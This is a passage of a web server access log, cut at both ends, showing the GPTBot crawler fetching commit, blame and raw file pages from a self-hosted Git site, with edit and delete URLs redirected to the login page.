(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" +[17/Feb/2026:16:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" +[17/Feb/2026:16:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" +[17/Feb/2026:16:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" +[17/Feb/2026:16:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" +[17/Feb/2026:16:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" +[17/Feb/2026:16:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" +[17/Feb/2026:16:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" +[17/Feb/2026:16:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" +[17/Feb/2026:16:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" +[17/Feb/2026:16:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" +[17/Feb/2026:16:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=all" [Client 74.7.227.38] [Length 8472] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:16:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37225] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37336] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:38:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10475] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10474] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10474] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:38:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:38:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16387] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:16:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:16:38:47 +0000] - 200 200 - GET https 